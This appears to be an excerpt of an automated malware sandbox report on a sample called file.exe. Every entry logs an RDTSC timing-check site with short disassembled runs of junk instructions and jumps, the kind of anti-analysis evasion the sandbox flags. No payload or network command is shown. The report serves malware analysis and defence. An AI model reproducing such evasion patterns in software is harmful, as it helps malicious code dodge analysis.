Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6C5A second address: BD6C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD7A89 second address: BD7AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9B1005724h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD7D2F second address: BD7D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D984Bh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD7D41 second address: BD7D5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005728h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD801A second address: BD8020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD8020 second address: BD802D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDC4BD second address: BDC4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDC4C3 second address: BDC4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDC4CC second address: BDC4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDC4D0 second address: BDC4EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9B1005724h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDC4EE second address: BDC4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE245B second address: BE2463 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE2463 second address: BE2473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B11D984Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE29F8 second address: BE2A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB9B1005716h 0x0000000a jmp 00007FB9B100571Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE2B3E second address: BE2B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE2F15 second address: BE2F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FB9B1005716h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE2F21 second address: BE2F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE2F2E second address: BE2F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE359D second address: BE35AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB9B11D9846h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BE35AE second address: BE35B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE777 second address: BEE77D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE77D second address: BEE797 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B1005720h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE93A second address: BEE956 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9B11D984Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB9B11D9846h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE956 second address: BEE95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE95A second address: BEE972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D984Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE972 second address: BEE976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE976 second address: BEE97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F11C second address: B9F120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F120 second address: B9F12E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FB9B11D9846h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEEC51 second address: BEEC5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB9B1005716h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEEDF5 second address: BEEDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2920 second address: BF2935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B1005721h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6DE5 second address: BF6DEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6DEB second address: BF6DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FB9B1005716h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5FD0 second address: BF5FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6668 second address: BF667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005721h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF667D second address: BF6683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6683 second address: BF6687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF67E6 second address: BF6849 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9B11D9846h 0x00000008 jmp 00007FB9B11D9851h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 je 00007FB9B11D984Ah 0x00000017 push edx 0x00000018 pop edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007FB9B11D9850h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FB9B11D984Eh 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FB9B11D9846h 0x00000031 jmp 00007FB9B11D9852h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF698D second address: BF6991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6991 second address: BF6997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6997 second address: BF69A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB9B1005716h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF69A7 second address: BF69AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF69AB second address: BF69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDFE8 second address: BFDFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jng 00007FB9B11D9846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFE8DF second address: BFE8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF229 second address: BFF250 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9B11D984Fh 0x0000000d jmp 00007FB9B11D9850h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04BEC second address: C04BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04BF5 second address: C04C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08D40 second address: C08D5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9B1005724h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E19 second address: C07E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E22 second address: C07E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E26 second address: C07E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07FDA second address: C07FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B100571Fh 0x00000009 jmp 00007FB9B100571Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07FF8 second address: C08008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08008 second address: C0800C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0814D second address: C08175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9852h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B11D984Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08175 second address: C0817A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C082AF second address: C082D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9B11D9857h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08431 second address: C0843B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9B1005716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085AA second address: C085B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007FB9B11D9846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085B8 second address: C085CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FB9B1005716h 0x0000000f jns 00007FB9B1005716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085CF second address: C085E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB9B11D984Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085E3 second address: C085E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085E7 second address: C085ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08766 second address: C0876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0876A second address: C08770 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0890A second address: C08910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A50 second address: C08A69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB9B11D984Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A69 second address: C08A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A6D second address: C08A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FC3D second address: C0FC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB9B1005727h 0x0000000a jmp 00007FB9B100571Ch 0x0000000f jmp 00007FB9B1005724h 0x00000014 popad 0x00000015 push edi 0x00000016 jmp 00007FB9B1005721h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDD1 second address: C0FDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDDB second address: C0FDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDE1 second address: C0FDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDE6 second address: C0FDFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9B1005720h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDFB second address: C0FE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9856h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C100FF second address: C10113 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FB9B1005716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FB9B1005716h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10113 second address: C10131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB9B11D9846h 0x00000011 ja 00007FB9B11D9846h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C102BE second address: C102C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10402 second address: C1041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FB9B11D9853h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1041C second address: C10426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB9B1005716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C105A0 second address: C105BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9855h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C105BB second address: C105DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FB9B100571Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FB9B1005716h 0x00000014 jnc 00007FB9B1005716h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1073A second address: C10740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10740 second address: C10744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10744 second address: C1074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1074A second address: C1076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FB9B1005720h 0x00000010 js 00007FB9B1005716h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1076E second address: C10775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10775 second address: C1077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C108D8 second address: C108DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C108DE second address: C108FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007FB9B1005716h 0x0000000d pop edi 0x0000000e je 00007FB9B100571Eh 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007FB9B1005716h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1139C second address: C113A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F828 second address: C0F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18684 second address: C18688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18688 second address: C1869B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B100571Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1869B second address: C186BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B11D985Dh 0x00000008 jmp 00007FB9B11D984Ch 0x0000000d jmp 00007FB9B11D984Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18218 second address: C1821E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1821E second address: C18224 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18224 second address: C1822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1822A second address: C1822F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25FB4 second address: C25FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B100571Dh 0x00000009 popad 0x0000000a ja 00007FB9B1005718h 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C27899 second address: C2789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2789D second address: C278A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
